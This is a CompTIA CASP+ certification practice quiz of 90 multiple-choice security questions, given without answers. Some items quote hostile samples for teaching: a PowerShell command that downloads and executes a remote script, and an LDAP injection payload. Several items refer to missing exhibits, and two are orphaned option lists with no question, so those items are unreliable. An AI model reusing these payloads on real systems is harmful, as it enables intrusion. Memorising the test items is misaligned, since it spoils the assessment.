Title of test:
Casp+ B

Description:
CompTIA CASP+

Author:
TheShed

Creation Date: 17/09/2024

Category: Computers

Number of questions: 90
Content:
A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment. Which of the following should the security administrator do to mitigate the risk? Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management. Suggest that the networking team contact the original embedded system's vendor to get an update to the system that does not require Flash. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
Given the following log snippet from a web server: Which of the following BEST describes this type of attack? SQL injection Cross-site scripting Brute-force Cross-site request forgery.
A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information. The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach? The pharmaceutical company The cloud software provider The web portal software vendor The database software vendor.
A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis. Which of the following steps would be best to perform FIRST? Turn off the infected host immediately Run a full anti-malware scan on the infected host. Modify the smb.conf file of the host to prevent outgoing SMB connections. Isolate the infected host from the network by removing all network connections.
A company's product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company's reputation in the market. Which of the following should the company implement to address the risk of system unavailability? User and entity behavior analytics Redundant reporting systems A self-healing system Application controls.
Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution? Biometric authenticators are immutable The likelihood of account compromise is reduced. Zero trust is achieved. Privacy risks are minimized.
A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information. Which of the following would be BEST for the company to implement? A WAF An IDS A SIEM A honeypot.
Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443 Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443 Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535 Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535 Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535 Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443.
As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver's licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation. Which of the following BEST describes this process? Deepfake Know your customer Identity proofing Passwordless.
A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack. Which of the following is the NEXT step of the incident response plan? Remediation Containment Response Recovery.
A recent data breach stemmed from unauthorized access to an employee's company account with a cloud-based productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information. Which of the following BEST mitigates inappropriate access and permissions issues? SIEM CASB WAF SOAR.
A security engineer is hardening a company's multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open: ✑ 25 ✑ 110 ✑ 137 ✑ 138 ✑ 139 ✑ 445 Internal Windows clients are used to transfer files to the server to stage them for customer download as part of the company's distribution process. Which of the following would be the BEST solution to harden the system? Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface. Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface. Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.
A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes. Which of the following should a security architect recommend? A DLP program to identify which files have customer data and delete them An ERP program to identify which processes need to be tracked A CMDB to report on systems that are not configured to security baselines A CRM application to consolidate the data and provision access based on the process and need.
A security analyst observes the following while looking through network traffic in a company's cloud log: Which of the following steps should the security analyst take FIRST? Quarantine 10.0.5.52 and run a malware scan against the host. Access 10.0.5.52 via EDR and identify processes that have network connections. Isolate 10.0.50.6 via security groups. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint? Isolation control failure Management plane breach Insecure data deletion Resource exhaustion.
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice. Which of the following should the organization consider FIRST to address this requirement? Implement a change management plan to ensure systems are using the appropriate versions. Hire additional on-call staff to be deployed if an event occurs. Design an appropriate warm site for business continuity Identify critical business processes and determine associated software and hardware requirements.
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted: when it is passed across a local network. in memory during processing. when it is written to a system's solid-state drive. by an enterprise hardware security module.
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements: ✑ Support all phases of the SDLC. ✑ Use tailored website portal software. ✑ Allow the company to build and use its own gateway software. ✑ Utilize its own data management platform. ✑ Continue using agent-based security tools. Which of the following cloud-computing models should the CIO implement? SaaS PaaS MaaS IaaS.
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware. Which of the following BEST describes the type of malware the solution should protect against? Worm Logic bomb Fileless Rootkit.
A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior. Which of the following would BEST safeguard the APIs? (Choose two.) Bot protection OAuth 2.0 Input validation Autoscaling endpoints Rate limiting CSRF protection.
An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution. Which of the following designs would be BEST for the CISO to use? Adding a second redundant layer of alternate vendor VPN concentrators Using Base64 encoding within the existing site-to-site VPN connections Distributing security resources across VPN sites Implementing IDS services with each VPN concentrator Transitioning to a container-based architecture for site-based services.
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government. Which of the following should be taken into consideration during the process of releasing the drive to the government? Encryption in transit Legal issues Chain of custody Order of volatility Key exchange.
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois` Which of the following security controls would have alerted and prevented the next phase of the attack? Antivirus and UEBA Reverse proxy and sandbox EDR and application approved list Forward proxy and MFA.
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents. Which of the following BEST describes this kind of risk response? Risk rejection Risk mitigation Risk transference Risk avoidance.
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform? Securely configure the authentication mechanisms. Patch the infrastructure at the operating system Execute port scanning against the services Upgrade the service as part of life-cycle management.
A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved. Which of the following would provide this information? HIPS UEBA HIDS NIDS.
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight. Which of the following testing methods would be BEST for the engineer to utilize in this situation? Software composition analysis Code obfuscation Static analysis Dynamic analysis.
A forensic investigator would use the foremost command for: cloning disks. analyzing network-captured packets. recovering lost files. extracting features such as email addresses.
A software company is developing an application in which data must be encrypted with a cipher that requires the following: ✑ Initialization vector ✑ Low latency ✑ Suitable for streaming Which of the following ciphers should the company use? Cipher feedback Cipher block chaining message authentication code Cipher block chaining Electronic codebook.
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software. During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational. Which of the following BEST describes the reason why the silent failure occurred? The system logs rotated prematurely The disk utilization alarms are higher than what the service restarts require The number of nodes in the self-healing cluster was healthy Conditional checks prior to the service restart succeeded.
A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication. Which of the following technologies would BEST meet this need? Faraday cage WPA2 PSK WPA3 SAE WEP 128 bit.
An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed. Which of the following side-channel attacks did the team use? Differential power analysis Differential fault analysis Differential temperature analysis Differential timing analysis.
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment. Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant? NAC to control authorized endpoints FIM on the servers storing the data A jump box in the screened subnet A general VPN solution to the primary network.
A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN. Which of the following solutions does this describe? Full tunneling Asymmetric routing SSH tunneling Split tunneling.
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: (&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin)) Which of the following would BEST mitigate this vulnerability? Network intrusion prevention Data encoding Input validation CAPTCHA.
A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility. Which of the following systems should the consultant review before making a recommendation? CAN ASIC FPGA SCADA.
Company A acquired Company B. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A's security program. Which of the following risk-handling techniques was used? Accept Avoid Transfer Mitigate.
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact. Which of the following should the organization perform NEXT? Assess the residual risk. Update the organization's threat model. Move to the next risk in the register. Recalculate the magnitude of impact.
A software house is developing a new application. The application has the following requirements: ✑ Reduce the number of credential requests as much as possible ✑ Integrate with social networks ✑ Authenticate users Which of the following is the BEST federation method to use for the application? WS-Federation OpenID OAuth SAML.
A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements: ✑ Be efficient at protecting the production environment ✑ Not require any change to the application ✑ Act at the presentation layer Which of the following techniques should be used? Masking Tokenization Algorithmic Random substitution.
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence. Which of the following offers an authoritative decision about whether the evidence was obtained legally? Lawyers Court Upper management team Police.
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out. Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered? Drive wiping Degaussing Purging Physical destruction.
A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence. Which of the following techniques would BEST support this? Configuring systemd services to run automatically at startup Creating a backdoor Exploiting an arbitrary code execution exploit Moving laterally to a more authoritative server/service.
A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic. When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the OT network? Packets that are the wrong size or length Use of any non-DNP3 communication on a DNP3 port Multiple solicited responses over time Application of an unsupported encryption algorithm.
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines: ✑ Must have a minimum of 15 characters ✑ Must use one number ✑ Must use one capital letter ✑ Must not be one of the last 12 passwords used Which of the following policies should be added to provide additional security? Shared accounts Password complexity Account lockout Password history Time-based logins.
A cybersecurity analyst discovered a private key that could have been exposed. Which of the following is the BEST way for the analyst to determine if the key has been compromised? HSTS CRL CSRs OCSP.
Which of the following technologies allows CSPs to add encryption across multiple data storages? Symmetric encryption Homomorphic encryption Data dispersion Bit splitting.
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company's Linux servers. While the software version is no longer supported by the OSS community, the company's Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future. Based on this agreement, this finding is BEST categorized as a: true positive true negative false positive false negative.
A company's Chief Information Security Officer is concerned that the company's proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC. Which of the following compensating controls would be BEST to implement in this situation? EDR SIEM HIDS UEBA.
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department provided the security team with a list of search terms to investigate. This is an example of: due diligence. e-discovery. due care. legal hold.
Which of the following protocols is a low-power, low-data-rate protocol that allows for the creation of PAN networks? Zigbee CAN DNP3 Modbus.
An organization's assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API. Given this information, which of the following is a noted risk? Feature delay due to extended software development cycles Financial liability from a vendor data breach Technical impact to the API configuration The possibility of the vendor's business ceasing operations.
A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls? Create a change management process Establish key performance indicators Create an integrated master schedule. Develop a communication plan. Perform a security control assessment.
A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements: ✑ Work at the application layer ✑ Send alerts on attacks from both privileged and malicious users ✑ Have a very low false positive Which of the following should the architect recommend? FIM WAF NIPS DAM UTM.
A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation? Loss of governance Vendor lockout Compliance risk Vendor lock-in.
A security architect needs to implement a CASB solution for an organization with a highly distributed remote workforce. One of the requirements for the implementation includes the capability to discover SaaS applications and block access to those that are unapproved or identified as risky. Which of the following would BEST achieve this objective? Deploy endpoint agents that monitor local web traffic to enforce DLP and encryption policies. Implement cloud infrastructure to proxy all user web traffic to enforce DLP and encryption policies Implement cloud infrastructure to proxy all user web traffic and control access according to centralized policy Deploy endpoint agents that monitor local web traffic and control access according to centralized policy.
During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place. Which of the following is the MOST likely solution? A WAF to protect web traffic User and entity behavior analytics Requirements to change the local password A gap analysis.
An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother's maiden name. When all of these are entered correctly, a new password is emailed to the user. Which of the following should concern the analyst the MOST? The security answers may be determined via online reconnaissance The password is too long, which may encourage users to write the password down The password should include a special character The minimum password length is too short.
In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation? Application-specific data assets Application user access management Application-specific logic and code Application/platform software.
An analyst received a list of IOCs from a government agency. The attack has the following characteristics: 1. The attack starts with bulk phishing. 2. If a user clicks on the link, a dropper is downloaded to the computer. 3. Each of the malware samples has unique hashes tied to the user. The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use? Update the incident response plan Blocklist the executable Deploy a honeypot onto the laptops Detonate in a sandbox.
An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data. Which of the following commands should the analyst run to BEST determine whether financial data was lost? `grep -v '^4[0-9]{12}(?:[0-9]{3})?$' file` `grep '^4[0-9]{12}(?:[0-9]{3})?$' file` `grep '^6(?:011|5[0-9]{2})[0-9]{12}?' file` `grep -v '^6(?:011|5[0-9]{2})[0-9]{12}?' file`
An organization requires a contractual document that includes: ✑ An overview of what is covered ✑ Goals and objectives ✑ Performance metrics for each party ✑ A review of how the agreement is managed by all parties Which of the following BEST describes this type of contractual document? SLA BAA NDA ISA.
A company based in the United States holds insurance details of EU citizens. Which of the following must be adhered to when processing EU citizens' personal, private, and confidential data? The principle of lawful, fair, and transparent processing The right to be forgotten principle of personal data erasure requests The non-repudiation and deniability principle The principle of encryption, obfuscation, and data masking.
A security analyst is evaluating the security of an online customer banking system. The analyst has a 12-character password for the test account. At the login screen, the analyst is asked to enter the third, eighth, and eleventh characters of the password. Which of the following describes why this request is a security concern? (Choose two.) The request is evidence that the password is more open to being captured via a keylogger The request proves that salt has not been added to the password hash, thus making it vulnerable to rainbow tables. The request proves the password is encoded rather than encrypted and thus less secure as it can be easily reversed. The request proves a potential attacker only needs to be able to guess or brute force three characters rather than 12 characters of the password. The request proves the password is stored in a reversible format, making it readable by anyone at the bank who is given access. The request proves the password must be in cleartext during transit, making it open to on-path attacks.
A company launched a new service and created a landing page within its website network for users to access the service. Per company policy, all websites must utilize encryption for any authentication pages. A junior network administrator proceeded to use an outdated procedure to order new certificates. Afterward, customers are reporting the following error when accessing a new web page: NET:ERR_CERT_COMMON_NAME_INVALID. Which of the following BEST describes what the administrator should do NEXT? Request a new certificate with the correct subject alternative name that includes the new websites Request a new certificate with the correct organizational unit for the company's website. Request a new certificate with a stronger encryption strength and the latest cipher suite Request a new certificate with the same information but including the old certificate on the CRL.
A large number of emails have been reported, and a security analyst is reviewing the following information from the emails: As part of the triage process, which of the following is the FIRST step the analyst should take? Block the email address carl.b@comptia1.com, as it is sending spam to subject matter experts. Validate the final "Received" header against the DNS entry of the domain. Compare the "Return-Path" and "Received" fields. Ignore the emails, as SPF validation is successful, and it is a false positive.
Which of the following is the BEST disaster recovery solution when resources are running in a cloud environment? Remote provider BCDR Cloud provider BCDR Alternative provider BCDR Primary provider BCDR.
Enable the X-Forwarded-For header at the load balancer. Install a software-based HIDS on the application servers Install a certificate signed by a trusted CA. Use stored procedures on the database server. Store the value of the $_SERVER['REMOTE_ADDR'] received by the web servers.
Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts partial responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement? IaaS SaaS FaaS PaaS.
A security analyst needs to recommend a remediation to the following threat: Which of the following actions should the security analyst propose to prevent this successful exploitation? Patch the system. Update the antivirus. Install a host-based firewall. Enable TLS 1.2.
An organization requires a legacy system to incorporate reference data into a new system. The organization anticipates the legacy system will remain in operation for the next 18 to 24 months. Additionally, the legacy system has multiple critical vulnerabilities with no patches available to resolve them. Which of the following is the BEST design option to optimize security? Limit access to the system using a jump box. Place the new system and legacy system on separate VLANs. Deploy the legacy application on an air-gapped system. Implement MFA to access the legacy system.
An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems. Which of the following is the MOST likely security consequence of this attack? A turbine would overheat and cause physical harm. The engineers would need to go to the historian. The SCADA equipment could not be maintained. Data would be exfiltrated through the data diodes.
Which of the following is required for an organization to meet the ISO 27018 standard? All PII must be encrypted. All network traffic must be inspected. GDPR equivalent standards must be met. COBIT equivalent standards must be met.
A company invested a total of $10 million for a new storage solution installed across five on-site datacenters. Fifty percent of the cost of this investment was for solid-state storage. Due to the high rate of wear on this storage, the company is estimating that 5% will need to be replaced per year. Which of the following is the ALE due to storage replacement? $50,000 $125,000 $250,000 $500,000 $1,000,000.
A security architect was asked to modify an existing internal network design to accommodate the following requirements for RDP: ✑ Enforce MFA for RDP. ✑ Ensure RDP connections are only allowed with secure ciphers. The existing network is extremely complex and not well segmented. Because of these limitations, the company has requested that the connections not be restricted by network-level firewalls or ACLs. Which of the following should the security architect recommend to meet these requirements? Implement a reverse proxy for remote desktop with a secure cipher configuration enforced. Implement a bastion host with a secure cipher configuration enforced. Implement a remote desktop gateway server, enforce secure ciphers, and configure to use OTP. Implement a GPO that enforces TLS cipher suites and limits remote desktop access to only VPN users.
An organization is deploying a new, online digital bank and needs to ensure availability and performance. The cloud-based architecture is deployed using PaaS and SaaS solutions, and it was designed with the following considerations: ✑ Protection from DoS attacks against its infrastructure and web applications is in place. ✑ Highly available and distributed DNS is implemented. ✑ Static content is cached in the CDN. ✑ A WAF is deployed inline and is in block mode. ✑ Multiple public clouds are utilized in an active-passive architecture. With the above controls in place, the bank is experiencing a slowdown on the unauthenticated payments page. Which of the following is the MOST likely cause? The public cloud provider is applying QoS to the inbound customer traffic. The API gateway endpoints are being directly targeted. The site is experiencing a brute-force credential attack. A DDoS attack is targeted at the CDN.
A healthcare system recently suffered from a ransomware incident. As a result, the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits, and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Choose three.) SD-WAN PAM Remote access VPN MFA Network segmentation BGP NAC.
A Chief Information Security Officer (CISO) is concerned that a company's current data disposal procedures could result in data remanence. The company uses only SSDs. Which of the following would be the MOST secure way to dispose of the SSDs given the CISO's concern? Degaussing Overwriting Shredding Formatting Incinerating.
The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints. Which of the following would BEST meet the requirement? An open-source automation server A static code analyzer Trusted open-source libraries A single code repository for all developers.
A security analyst wants to keep track of all outbound web connections from workstations. The analyst's company uses an on-premises web filtering solution that forwards the outbound traffic to a perimeter firewall. When the security analyst gets the connection events from the firewall, the source IP of the outbound web traffic is the translated IP of the web filtering solution. Considering this scenario involving source NAT, which of the following would be the BEST option to inject in the HTTP header to include the real source IP from workstations? X-Forwarded-Proto X-Forwarded-For Cache-Control Strict-Transport-Security Content-Security-Policy.
An HVAC contractor requested network connectivity permission to remotely support/troubleshoot equipment issues at a company location. Currently, the company does not have a process that allows vendors remote access to the corporate network. Which of the following solutions represents the BEST course of action to allow the contractor access? Add the vendor's equipment to the existing network. Give the vendor access through the standard corporate VPN. Give the vendor a standard desktop PC to attach the equipment to. Give the vendor access through the standard corporate VPN. Establish a certification process for the vendor. Allow certified vendors access to the VDI to monitor and maintain the HVAC equipment. Create a dedicated segment with no access to the corporate network. Implement dedicated VPN hardware for vendor access.
An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk? SDLC attack Side-load attack Remote code signing Supply chain attack.
A company is adopting a new artificial-intelligence-based analytics SaaS solution. This is the company's first attempt at using a SaaS solution, and a security architect has been asked to determine any future risks. Which of the following would be the GREATEST risk in adopting this solution? The inability to assign access controls to comply with company policy. The inability to require the service provider process data in a specific country. The inability to obtain company data when migrating to another service. The inability to conduct security assessments against a service provider.
A BIA of a popular online retailer identified several mission-essential functions that would take more than seven days to recover in the event of an outage. Which of the following should be considered when setting priorities for the restoration of these functions? Supply chain issues Revenue generation Warm-site operations Scheduled impacts to future projects.
A software development company makes its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website. Which of the following would be the technique to ensure the software the users download is the official software released by the company? Distribute the software via a third-party repository. Close the web repository and deliver the software via email. Email the software link to all customers. Display the SHA checksum on the website.
An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely. Which of the following features of these devices MOST likely led to this decision? (Choose two.) Software-backed keystore Embedded cryptoprocessor Hardware-backed public key storage Support for stream ciphers Decentralized key management TPM 2.0 attestation services.
A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program. A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated OSs. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure? Segment the systems to reduce the attack surface if an attack occurs. Migrate the services to new systems with a supported and patched OS. Patch the systems to the latest versions of the existing OSs. Install anti-malware, HIPS, and host-based firewalls on each of the systems.
A company was recently infected by malware. During the root cause analysis, the company determined that several users were installing their own applications. To prevent further compromises, the company has decided it will only allow authorized applications to run on its systems. Which of the following should the company implement? Signing Access control HIPS Permit listing.
A security analyst is reviewing the following vulnerability assessment report: Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts? Server 1 Server 2 Server 3 Server 4.
An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs? Ladder logic Rust C Python Java.